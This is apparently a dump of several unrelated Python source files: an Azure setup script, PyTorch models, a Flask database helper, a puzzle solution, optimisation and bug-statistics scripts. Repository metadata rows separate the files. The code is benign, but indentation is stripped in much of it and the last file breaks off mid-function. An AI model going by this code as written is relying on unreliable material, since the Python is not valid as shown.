PACKAGE_NAME = "azure-core"
PACKAGE_PPRINT_NAME = "Core"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, '_version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', # type: ignore
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.md', encoding='utf-8') as f:
readme = f.read()
with open('CHANGELOG.md', encoding='utf-8') as f:
changelog = f.read()
setup(
name=PACKAGE_NAME,
version=version,
include_package_data=True,
description='Microsoft Azure {} Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + changelog,
long_description_content_type='text/markdown',
license='MIT License',
author='Microsoft Corporation',
author_email='azpysdkhelp@microsoft.com',
url='https://github.com/Azure/azure-sdk-for-python/tree/master/sdk/core/azure-core',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=[
'tests',
# Exclude packages that will be covered by PEP420 or nspkg
'azure',
]),
package_data={
'pytyped': ['py.typed'],
},
install_requires=[
'requests>=2.18.4',
'six>=1.6',
],
extras_require={
":python_version<'3.0'": ['azure-nspkg'],
":python_version<'3.4'": ['enum34>=1.0.4'],
":python_version<'3.5'": ['typing'],
}
)
| 33.730769
| 88
| 0.596351
|
8d9ca0dff8f6497ba3d17a72fede976aaabfe8d6
| 6,995
|
py
|
Python
|
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | 2
|
2020-10-12T13:50:42.000Z
|
2021-05-18T07:03:31.000Z
|
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | null | null | null |
dynehr/model.py
|
jacobdeasy/dynamic-ehr
|
b01d5cd17b577c457a050daedc765939eaa114dc
|
[
"MIT"
] | 1
|
2020-09-23T22:21:55.000Z
|
2020-09-23T22:21:55.000Z
|
"""Module containing the main model class."""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import e, pi
from scipy.stats import truncnorm
from torch.nn import Parameter
from torch import tensor, Tensor
from dynehr.lstms import LSTM
from utils.helpers import get_device
class Embedding(nn.Module):
def __init__(self, n_tokens, emb_dim,
variational=False,
prior_std=0.25):
"""
Embedding class with built-in variational option.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
            Dimensionality of the embedding space
variational : bool, optional
Whether to use a variational embedding
prior_std : float, optional
Standard deviation of Gaussian prior for variational embedding
"""
super(Embedding, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.variational = variational
self.prior_std = prior_std
self.reset_parameters()
def reset_parameters(self):
with torch.no_grad():
t = 1. / (self.n_tokens ** (1 / 2))
W = truncnorm.rvs(-t, t, size=[self.n_tokens, self.emb_dim])
if self.variational:
mu = W
logvar = np.log(self.prior_std * np.ones_like(W))
W = np.concatenate((mu, logvar), axis=1)
self.W = Parameter(tensor(W).float())
def reparameterize(self, mean, logvar):
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return mean + std * eps
else:
return mean
def forward(self, x):
x = F.embedding(x, self.W)
if self.variational:
mu = x[..., :self.emb_dim]
logvar = x[..., self.emb_dim:]
x = self.reparameterize(mu, logvar)
return x, mu, logvar
else:
return x
class Aggregator(nn.Module):
def __init__(self, n_tokens, emb_dim,
T=48.0):
"""
        Embedding aggregation class based on equal time intervals
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
            Dimensionality of the embedding space
T : float, optional
Total period of time
"""
super(Aggregator, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.T = T
self.device = get_device()
self.embed = Embedding(n_tokens, emb_dim,
variational=False)
def forward(self, X):
T = X[:, :, 0]
X = X[:, :, 1]
T_mask = T < self.T
n = T_mask.sum(dim=1).max()
T = T[:, :n]
X = X[:, :n].long()
emb = self.embed(X)
out = []
for t in torch.arange(0, self.T, self.T/48, dtype=torch.float32).to(self.device):
t_idx = ((t <= T) & (T < (t+self.T/48))).float().unsqueeze(2)
X_t = t_idx * emb
X_t = X_t.sum(dim=1, keepdim=True)
out += [X_t]
return torch.cat(out, dim=1)
class VariationalAggregator(nn.Module):
def __init__(self, n_tokens, emb_dim,
T=48):
"""
        Variational embedding aggregation class based on equal cumulative-entropy intervals.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
            Dimensionality of the embedding space
T : float, optional
Total period of time
"""
super(VariationalAggregator, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.T = T
self.device = get_device()
self.embed = Embedding(n_tokens, emb_dim,
variational=True)
def forward(self, X):
T = X[:, :, 0]
X = X[:, :, 1]
T_mask = T < self.T
n = T_mask.sum(dim=1).max()
X = X[:, :n].long()
emb, mu, logvar = self.embed(X)
# KL divergence from p(z)~N(0,I) loss component
kl_loss = _kl_normal_loss(mu, logvar)
# Entropy of multivariate normal distribution:
        H = 0.5 * (self.emb_dim + self.emb_dim * np.log(2 * pi) + logvar.sum(dim=2))
H = H * T_mask[:, :n].float()
H_cum = H.cumsum(dim=1)
H_cum = H_cum / H_cum.max(dim=1, keepdim=True)[0]
out = []
for h in torch.arange(0, 1., 1./48, dtype=torch.float32).to(self.device):
h_idx = ((h <= H_cum) & (H_cum < (h+1./48))).float().unsqueeze(2)
X_h = h_idx * emb
X_h_sum = X_h.sum(dim=1, keepdim=True)
out += [X_h_sum]
return torch.cat(out, dim=1), kl_loss
class Net(nn.Module):
def __init__(self, n_tokens, emb_dim, rnn_dim,
T=48.0,
variational=False,
layer_norm=False):
"""
Class defining network structure.
Parameters
----------
n_tokens : int
Number of tokens to embed
emb_dim : int
            Dimensionality of the embedding space
rnn_dim : int
Dimensionality of rnn space
T : float, optional
Total period of time
variational : bool, optional
Whether to use a variational embedding
layer_norm : bool, optional
Whether to use layer normalisation in the LSTM unit
"""
super(Net, self).__init__()
self.n_tokens = n_tokens
self.emb_dim = emb_dim
self.rnn_dim = rnn_dim
self.T = T
self.variational = variational
self.layer_norm = layer_norm
if self.variational:
self.embedding = VariationalAggregator(n_tokens, emb_dim, T=T)
else:
self.embedding = Aggregator(n_tokens, emb_dim, T=T)
self.lstm = LSTM(emb_dim, rnn_dim, layer_norm=layer_norm)
self.fc = nn.Linear(rnn_dim, 1)
def forward(self, x):
emb = self.embedding(x)
all_hidden, (final_hidden, _) = self.lstm(emb)
output = self.fc(all_hidden).squeeze()
return output.sigmoid()
def _kl_normal_loss(mean, logvar):
"""
Calculates the KL divergence between a normal distribution
with diagonal covariance and a unit normal distribution.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (batch_size, latent_dim) where
D is dimension of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (batch_size,
latent_dim)
"""
latent_dim = mean.size(1)
# batch mean of kl for each latent dimension
latent_kl = 0.5 * (-1 - logvar + mean.pow(2) + logvar.exp()).mean(dim=0)
total_kl = latent_kl.sum()
return total_kl
| 27.53937
| 89
| 0.551108
|
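A quick numerical check of the _kl_normal_loss formula above: for a posterior with zero mean and unit variance (logvar = 0), every term cancels and the KL divergence is exactly zero.

# Sanity check of the KL formula used in _kl_normal_loss above:
# mean = 0 and logvar = 0 (unit variance) gives -1 - 0 + 0 + 1 = 0 per dimension.
import torch

mean = torch.zeros(8, 16)
logvar = torch.zeros(8, 16)
latent_kl = 0.5 * (-1 - logvar + mean.pow(2) + logvar.exp()).mean(dim=0)
print(latent_kl.sum().item())  # 0.0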
a57a80f93dd8f40618eec2970a25c217a7264d8b
| 44
|
py
|
Python
|
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
source/pyzzle/recon/__init__.py
|
blackslender/x
|
5bd6b36fe01af7ecb1506e7f8e90ebc69b31780d
|
[
"MIT"
] | null | null | null |
from .recon import init_recon_job, ReconJob
| 22
| 43
| 0.840909
|
28f34718b303b8e2eb1591dd3a0693cbcde10a59
| 810
|
py
|
Python
|
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
db.py
|
kamwithak/learn-complexity.herokuapp.com
|
b6db945553016dfe95cb35afda37abb90a298fd4
|
[
"MIT"
] | null | null | null |
import sqlite3
import click
from flask import current_app, g
from flask.cli import with_appcontext
def get_db():
if "db" not in g:
g.db = sqlite3.connect(
"sqlite_db", detect_types=sqlite3.PARSE_DECLTYPES
)
g.db.row_factory = sqlite3.Row
return g.db
def close_db(e=None):
db = g.pop("db", None)
if db is not None:
db.close()
def init_db():
db = get_db()
with current_app.open_resource("schema.sql") as f:
db.executescript(f.read().decode("utf8"))
@click.command("init-db")
@with_appcontext
def init_db_command():
"""Clear the existing data and create new tables."""
init_db()
click.echo("Initialized the database.")
def init_app(app):
app.teardown_appcontext(close_db)
app.cli.add_command(init_db_command)
| 21.891892
| 61
| 0.660494
|
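The module above follows the Flask application-factory pattern; a typical wiring sketch (assuming db.py is importable next to the factory module, as in the Flask tutorial layout) is:

# Hypothetical application factory showing how init_app above is typically wired in.
# Assumes db.py is importable as `db`; the real project layout may differ.
from flask import Flask
import db

def create_app():
    app = Flask(__name__)
    db.init_app(app)  # registers the close_db teardown and the `flask init-db` command
    return app

With that in place, running `flask init-db` invokes init_db_command, which executes schema.sql against the "sqlite_db" file opened by get_db.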
2c14c7da4e954f22f53925a63fd27b60f942ace3
| 3,066
|
py
|
Python
|
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | null | null | null |
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | 7
|
2019-11-20T10:04:49.000Z
|
2022-03-18T00:19:12.000Z
|
y2018/day04/day04.py
|
ammarnajjar/adventofcode
|
d8c6416cdad9ca4a254c4888422fa3ce29524685
|
[
"MIT"
] | null | null | null |
import os
from collections import defaultdict
from datetime import datetime
from typing import Dict
from typing import List
from typing import Tuple
def order_chronologically(data_list: List[str]) -> List[str]:
return sorted(
data_list,
key=lambda x: datetime.strptime(x[1:17], '%Y-%m-%d %H:%M'),
)
SleepingMap = Tuple[
Dict[int, int],
Dict[
int,
List[Tuple[int, int]],
],
]
SpanType = Dict[
int,
List[Tuple[int, int]],
]
def sleeping_map(sorted_data_list: List[str]) -> SleepingMap:
minutes: Dict[int, int] = {}
spans: SpanType = defaultdict(list)
for entry in sorted_data_list:
if 'Guard' in entry:
guard_id = int(entry.split('#')[1].split()[0])
if 'falls' in entry:
start_sleeping = datetime.strptime(entry[1:17], '%Y-%m-%d %H:%M')
if 'wakes' in entry:
end_sleeping = datetime.strptime(entry[1:17], '%Y-%m-%d %H:%M')
minutes.update({
guard_id: minutes.get(guard_id, 0) + (
end_sleeping - start_sleeping
).seconds // 60,
})
spans[guard_id].append(
(start_sleeping.minute, end_sleeping.minute),
)
return minutes, dict(spans)
def key_with_max_value(minutes: Dict[int, int]) -> int:
sorted_list_of_tuples = sorted(
minutes.items(),
key=lambda x: x[1],
reverse=True,
)
return sorted_list_of_tuples[0][0]
def minute_most_asleep(spans: List[Tuple[int, int]]) -> Tuple[int, int]:
rank = {m: 0 for m in range(60)}
for m in range(60):
for span in spans:
if m in range(*span):
rank[m] += 1
minute = key_with_max_value(rank)
frequency = rank[minute]
return minute, frequency
def choose_guard(input_data: str) -> int:
data_list = input_data.strip().split('\n')
actions_in_order = order_chronologically(data_list)
minutes, spans = sleeping_map(actions_in_order)
chosen_guard = key_with_max_value(minutes)
chosen_minute, _ = minute_most_asleep(spans[chosen_guard])
return chosen_guard * chosen_minute
def guard_freq_alseep(input_data: str) -> int:
data_list = input_data.strip().split('\n')
actions_in_order = order_chronologically(data_list)
minutes, spans = sleeping_map(actions_in_order)
guard_freq = {}
freq_minute = {}
for k, span_list in spans.items():
m, f = minute_most_asleep(span_list)
guard_freq.update({k: f})
freq_minute.update({f: m})
chosen_guard = key_with_max_value(guard_freq)
chosen_minute = freq_minute[guard_freq[chosen_guard]]
return chosen_guard * chosen_minute
if __name__ == '__main__':  # pragma: no cover
current_path = os.path.dirname(os.path.realpath(__file__))
with open(f'{current_path}/input04', 'r') as input_file:
input_text = input_file.read()
print(f'Chosen guard = {choose_guard(input_text)}')
print(f'Guard frequent sleep minute = {guard_freq_alseep(input_text)}')
| 30.66
| 79
| 0.632094
|
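A small hand check of minute_most_asleep from the script above (assuming it is importable as a module named day04): minute 24 is covered by two of the three spans, every other minute by at most one.

# Assumes the script above is importable as a module named `day04`.
from day04 import minute_most_asleep

spans = [(5, 25), (24, 29), (30, 55)]
minute, frequency = minute_most_asleep(spans)
print(minute, frequency)  # 24 2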
ab32be4d92578608d6f0a15a7632f037b3f2fc2d
| 3,374
|
py
|
Python
|
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
src/Atlas/heli_opt_complex.py
|
swryan/Atlas
|
c5e8800d326d6442ceb4d0ab7910bbbda2ce4838
|
[
"Apache-2.0"
] | null | null | null |
from openmdao.main.api import Assembly, set_as_top
from openmdao.lib.datatypes.api import Float
from openmdao.lib.drivers.api import SLSQPdriver
try:
from pyopt_driver import pyopt_driver
except ImportError:
pyopt_driver = None
from openmdao.util.log import enable_trace # , disable_trace
from numpy import pi
from Atlas import AtlasConfiguration, AeroStructural
class ConfigOpt(AtlasConfiguration):
""" Atlas configuration for single point optimization """
# inputs for optimizer
Omega_opt = Float(iotype='in', desc='rotor angular velocity')
def execute(self):
super(ConfigOpt, self).execute()
# use optimizer provided value for Omega
self.Omega = self.Omega_opt
class AeroStructuralOpt(AeroStructural):
""" AeroStructural assembly for single point optimization """
def configure(self):
super(AeroStructuralOpt, self).configure()
# replace config with optimizer driven config
self.replace('config', ConfigOpt())
# create passthroughs for variables used by the optimizer
self.create_passthrough('config.Omega_opt')
self.create_passthrough('struc.Mtot')
self.create_passthrough('results.Ttot')
self.create_passthrough('results.Ptot')
class HeliOpt(Assembly):
""" Single point aero-structural optimization """
def configure(self):
# add an optimizer and an AeroStructural assembly
if pyopt_driver and 'SNOPT' in pyopt_driver._check_imports():
self.add("driver", pyopt_driver.pyOptDriver())
self.driver.optimizer = "SNOPT"
self.driver.options = {
# any changes to default SNOPT options?
}
else:
print 'SNOPT not available, using SLSQP'
self.add('driver', SLSQPdriver())
self.add('aso', AeroStructuralOpt())
# objective: minimize total power
self.driver.add_objective('aso.Ptot')
# parameter: rotor speed
self.driver.add_parameter('aso.Omega_opt',
low=0.15*2*pi, high=0.25*2*pi)
self.aso.Omega_opt = 0.2*2*pi # initial value
# constraint: lift >= weight
self.driver.add_constraint('aso.Mtot*9.8-aso.Ttot<=0')
# TODO: optional constraints
#
# if flags.ConFail:
# Structural Failure in Rotor Spar (ConFail)
# Buckling failure of spar (ConFailBuck)
# Tensile failure in wire (ConFailWire)
#
# if flags.ConDef:
# Constraints on Maximum Deformation (ConDelta)
if __name__ == '__main__':
opt = set_as_top(HeliOpt())
opt.driver.gradient_options.force_fd = True
opt.driver.gradient_options.fd_step = 1e-3
opt.driver.gradient_options.fd_form = "complex_step"
#opt.aso.Omega_opt = 1.0512
#opt.driver.run_iteration()
print 'Parameter: Omega =', opt.aso.config.Omega
print 'Constraint: Weight-Lift =', (opt.aso.Mtot*9.8-opt.aso.Ttot)
print 'Objective: Ptot =', opt.aso.Ptot
# enable_trace()
#exit()
opt.run()
print 'Parameter: Omega =', opt.aso.config.Omega
print 'Constraint: Weight-Lift =', (opt.aso.Mtot*9.8-opt.aso.Ttot)
print 'Objective: Ptot =', opt.aso.Ptot
# for reference, MATLAB solution:
# Omega: 1.0512
# Ptot: 421.3185
| 29.596491
| 70
| 0.645821
|
98d06a5c783c7c3ae6a4de2c0c452b279dffb9aa
| 804
|
py
|
Python
|
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
netbeans/assignee/total_bugs.py
|
imlegend19/MDSN-DevRank
|
bb1b71f72d2fb97044a62e8e0152dadb88de6411
|
[
"MIT"
] | null | null | null |
import pickle
from local_settings_netbeans import db
with db:
cur = db.cursor()
cur.execute(
"SELECT DISTINCT assigned_to FROM test_bugs_fixed_closed "
"WHERE assigned_to IN (SELECT who FROM test_longdescs_fixed_closed) and year(creation_ts) between 2002 and 2005")
assignees = []
for i in cur.fetchall():
assignees.append(i[0])
cur.execute("select assigned_to, count(distinct bug_id) from test_bugs_fixed_closed where year(creation_ts) between 2002 and 2005 group by assigned_to")
assignee_bugs = {}
for i in cur.fetchall():
if i[0] in assignees:
assignee_bugs[i[0]] = i[1]
print(assignee_bugs)
with open("assignee_total_bugs.txt", 'wb') as fp:
pickle.dump(assignee_bugs, fp)
print("Process Finished!")
| 28.714286
| 156
| 0.685323
|
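The script above pickles the assignee-to-bug-count mapping into assignee_total_bugs.txt; reading it back is the mirror image of the dump:

# Reading back the pickled assignee -> bug-count mapping written by the script above.
import pickle

with open("assignee_total_bugs.txt", 'rb') as fp:
    assignee_bugs = pickle.load(fp)
print(len(assignee_bugs), "assignees loaded")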
6155a812936aaa5ac0d2d7e9cd44ac93367b3481
| 4,592
|
py
|
Python
|
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | 1
|
2022-01-11T14:13:22.000Z
|
2022-01-11T14:13:22.000Z
|
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | null | null | null |
meta.py
|
Maxence-Labesse/MLKit
|
7f8d92b5d3e025dc3719c3bbaf1f2e55afda5107
|
[
"MIT"
] | 1
|
2020-07-10T09:51:22.000Z
|
2020-07-10T09:51:22.000Z
|
# Import
from time import time
from datetime import date
from AutoMxL import *
import pandas as pd
from AutoMxL.Utils.Display import print_title1, print_dict
from AutoMxL.Utils.Utils import random_from_dict
from data.data_config import d_files
from AutoMxL.param_config import n_epoch, learning_rate, batch_size, crit, optim
"""
AutoML meta-test algorithm:
- Apply AutoML to multiple datasets with random parameter tuning
- Store dataset information, AutoML parameters and model performance in meta.csv
"""
# Meta config #
###############
d_all_param = dict()
# number of iterations over the datasets
n_iter = 1
# number of model iterations for each dataset
model_iter = 5
# date reference for date transformations (timedelta)
today_date = date.today().strftime("%d/%m/%Y")
# AutoML param #
################
# outliers processing
d_all_param['outliers'] = [True, False]
# available models
d_all_param['clf'] = ['RF', 'XGBOOST']
# features selection
d_all_param['select_method'] = ['pca', None]
# categorical encoding method
d_all_param['cat_method'] = ['deep_encoder', 'one_hot']
# whether to use bagging for modelling
d_all_param['bagging'] = [True, False]
start_meta = time()
# Extend existing storing file meta.csv
# df_meta = pd.read_csv('meta.csv', sep=",")
# Create new storing file meta.csv
df_meta = pd.DataFrame(
columns=['file_name', 'date', 'exec_time', 'nrow', 'ncol', 'nnum', 'ncat', 'ndate', 'cat_method',
              'n_epoch', 'learning_rate', 'batch_size', 'crit', 'optim', 'process_outliers', 'select_method',
              'clf', 'bagging', 'n_model', 'n_valid_models', 'AUC', 'delta_auc', 'precision', 'recall', 'F1'])
#############
# Meta Algo #
#############
for i in range(n_iter):
for file in [file for file in d_files.keys()]:
# import
df_raw = import_data(file, verbose=False)
# print
print_title1(file + " / niter : " + str(i))
print("\nTaille du dataset brut", df_raw.shape)
before = time()
# pick random parameters from d_all_param
d_param = random_from_dict(d_all_param, verbose=True)
# encode target
new_df, target = category_to_target(df_raw, var=d_files[file]['var'], cat=d_files[file]['cat'])
# instantiate AML object
auto_df = AML(new_df.copy(), target=target)
# explore
auto_df.explore(verbose=False)
print_dict(auto_df.d_features)
# preprocess
auto_df.preprocess(process_outliers=d_param['outliers'], cat_method=d_param['cat_method'], verbose=False)
# select features
if d_param['select_method'] is not None:
auto_df.select_features(method=d_param['select_method'], verbose=False)
print("Taille du dataset avant modele :", auto_df.shape)
# random search
res_dict, l_valid_models, best_model_index, df_test = auto_df.model_train_test(clf=d_param['clf'],
top_bagging=d_param['bagging'],
n_comb=model_iter,
comb_seed=None, verbose=True)
# if a best model is found, store metrics, else store -1
if best_model_index is not None:
HP = res_dict[best_model_index]['metrics']
df_meta = df_meta.append(
{'file_name': file, 'date': today_date, 'exec_time': str(round(time() - before, 4)),
'nrow': df_raw.shape[0], 'ncol': df_raw.shape[1], 'nnum': len(auto_df.d_features['numerical']),
'ncat': len(auto_df.d_features['categorical']), 'ndate': len(auto_df.d_features['date']),
'cat_method': d_param['cat_method'], 'n_epoch': n_epoch, 'learning_rate': learning_rate,
'batch_size': batch_size, 'crit': crit, 'optim': optim,
'process_outliers': str(d_param['outliers']), 'select_method': str(d_param['select_method']),
'clf': d_param['clf'], 'bagging': d_param['bagging'], 'n_model': model_iter,
'n_valid_models': len(l_valid_models), 'AUC': HP['Roc_auc'] if HP else -1,
'delta_auc': HP['delta_auc'] if HP else -1, 'precision': HP['Precision'] if HP else -1,
'recall': HP['Recall'] if HP else -1, 'F1': HP['F1'] if HP else -1
}, ignore_index=True)
# store models results
df_meta.to_csv('meta.csv', index=False)
stop_meta = time()
print(str(round(stop_meta - start_meta, 4)))
| 40.280702
| 119
| 0.609538
|
b4704990b1c826d80f70149ea10bb6e92b530ce0
| 11,193
|
py
|
Python
|
src/core/bamnet/ent_modules.py
|
siyangZhao/BAMnet
|
4c6222610c120a4a114daf40938219ea0ca57dc6
|
[
"Apache-2.0"
] | 170
|
2019-03-06T16:08:22.000Z
|
2022-03-16T09:09:31.000Z
|
src/core/bamnet/ent_modules.py
|
YL1113/BAMnet
|
2f73e1c96dbc1643f1b37e3b5589ee8d9916a8e3
|
[
"Apache-2.0"
] | 11
|
2019-05-24T06:19:03.000Z
|
2021-11-26T19:08:34.000Z
|
src/core/bamnet/ent_modules.py
|
YL1113/BAMnet
|
2f73e1c96dbc1643f1b37e3b5589ee8d9916a8e3
|
[
"Apache-2.0"
] | 37
|
2019-06-03T02:49:15.000Z
|
2021-12-03T17:55:03.000Z
|
'''
Created on Sep, 2018
@author: hugo
'''
import numpy as np
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence
import torch.nn.functional as F
from .modules import SeqEncoder, SelfAttention_CoAtt, Attention
from .utils import to_cuda
INF = 1e20
VERY_SMALL_NUMBER = 1e-10
class Entnet(nn.Module):
def __init__(self, vocab_size, vocab_embed_size, o_embed_size, \
hidden_size, num_ent_types, num_relations, \
seq_enc_type='cnn', \
word_emb_dropout=None, \
que_enc_dropout=None,\
ent_enc_dropout=None, \
pre_w2v=None, \
num_hops=1, \
att='add', \
use_cuda=True):
super(Entnet, self).__init__()
self.use_cuda = use_cuda
self.seq_enc_type = seq_enc_type
self.que_enc_dropout = que_enc_dropout
self.ent_enc_dropout = ent_enc_dropout
self.num_hops = num_hops
self.hidden_size = hidden_size
self.que_enc = SeqEncoder(vocab_size, vocab_embed_size, hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[2, 3], \
init_word_embed=pre_w2v, \
use_cuda=use_cuda).que_enc
self.ent_enc = EntEncoder(o_embed_size, hidden_size, \
num_ent_types, num_relations, \
vocab_size=vocab_size, \
vocab_embed_size=vocab_embed_size, \
shared_embed=self.que_enc.embed, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
ent_enc_dropout=ent_enc_dropout, \
use_cuda=use_cuda)
self.batchnorm = nn.BatchNorm1d(hidden_size)
if seq_enc_type in ('lstm', 'gru'):
self.self_atten = SelfAttention_CoAtt(hidden_size)
print('[ Using self-attention on question encoder ]')
self.ent_memory_hop = EntRomHop(hidden_size, hidden_size, hidden_size, atten_type=att)
print('[ Using {}-hop entity memory update ]'.format(num_hops))
def forward(self, memories, queries, query_lengths):
x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask = memories
x_rel_mask = self.create_mask_3D(x_rel_mask, x_rels.size(-1), use_cuda=self.use_cuda)
# Question encoder
if self.seq_enc_type in ('lstm', 'gru'):
Q_r = self.que_enc(queries, query_lengths)[0]
if self.que_enc_dropout:
Q_r = F.dropout(Q_r, p=self.que_enc_dropout, training=self.training)
query_mask = self.create_mask(query_lengths, Q_r.size(1), self.use_cuda)
q_r = self.self_atten(Q_r, query_lengths, query_mask)
else:
q_r = self.que_enc(queries, query_lengths)[1]
if self.que_enc_dropout:
q_r = F.dropout(q_r, p=self.que_enc_dropout, training=self.training)
# Entity encoder
ent_val, ent_key = self.ent_enc(x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask)
ent_val = torch.cat([each.unsqueeze(2) for each in ent_val], 2)
ent_key = torch.cat([each.unsqueeze(2) for each in ent_key], 2)
ent_val = torch.sum(ent_val, 2)
ent_key = torch.sum(ent_key, 2)
mem_hop_scores = []
mid_score = self.clf_score(q_r, ent_key)
mem_hop_scores.append(mid_score)
for _ in range(self.num_hops):
q_r = q_r + self.ent_memory_hop(q_r, ent_key, ent_val)
q_r = self.batchnorm(q_r)
mid_score = self.clf_score(q_r, ent_key)
mem_hop_scores.append(mid_score)
return mem_hop_scores
def clf_score(self, q_r, ent_key):
return torch.matmul(ent_key, q_r.unsqueeze(-1)).squeeze(-1)
def create_mask(self, x, N, use_cuda=True):
x = x.data
mask = np.zeros((x.size(0), N))
for i in range(x.size(0)):
mask[i, :x[i]] = 1
return to_cuda(torch.Tensor(mask), use_cuda)
def create_mask_3D(self, x, N, use_cuda=True):
x = x.data
mask = np.zeros((x.size(0), x.size(1), N))
for i in range(x.size(0)):
for j in range(x.size(1)):
mask[i, j, :x[i, j]] = 1
return to_cuda(torch.Tensor(mask), use_cuda)
class EntEncoder(nn.Module):
"""Entity Encoder"""
def __init__(self, o_embed_size, hidden_size, num_ent_types, num_relations, vocab_size=None, \
vocab_embed_size=None, shared_embed=None, seq_enc_type='lstm', word_emb_dropout=None, \
ent_enc_dropout=None, use_cuda=True):
super(EntEncoder, self).__init__()
# Cannot have embed and vocab_size set as None at the same time.
self.ent_enc_dropout = ent_enc_dropout
self.hidden_size = hidden_size
self.relation_embed = nn.Embedding(num_relations, o_embed_size, padding_idx=0)
self.embed = shared_embed if shared_embed is not None else nn.Embedding(vocab_size, vocab_embed_size, padding_idx=0)
self.vocab_embed_size = self.embed.weight.data.size(1)
self.linear_node_name_key = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_node_type_key = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_rels_key = nn.Linear(hidden_size + o_embed_size, hidden_size, bias=False)
self.linear_node_name_val = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_node_type_val = nn.Linear(hidden_size, hidden_size, bias=False)
self.linear_rels_val = nn.Linear(hidden_size + o_embed_size, hidden_size, bias=False)
self.kg_enc_ent = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # entity name
self.kg_enc_type = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # entity type name
self.kg_enc_rel = SeqEncoder(vocab_size, \
self.vocab_embed_size, \
hidden_size, \
seq_enc_type=seq_enc_type, \
word_emb_dropout=word_emb_dropout, \
bidirectional=True, \
cnn_kernel_size=[3], \
shared_embed=shared_embed, \
use_cuda=use_cuda).que_enc # relation name
def forward(self, x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask):
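# Encode the KG features, then project them into separate key and value spaces for the memory network.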
node_ent_names, node_type_names, node_types, edge_rel_names, edge_rels = self.enc_kg_features(x_ent_names, x_ent_name_len, x_type_names, x_types, x_type_name_len, x_rel_names, x_rels, x_rel_name_len, x_rel_mask)
node_name_key = self.linear_node_name_key(node_ent_names)
node_type_key = self.linear_node_type_key(node_type_names)
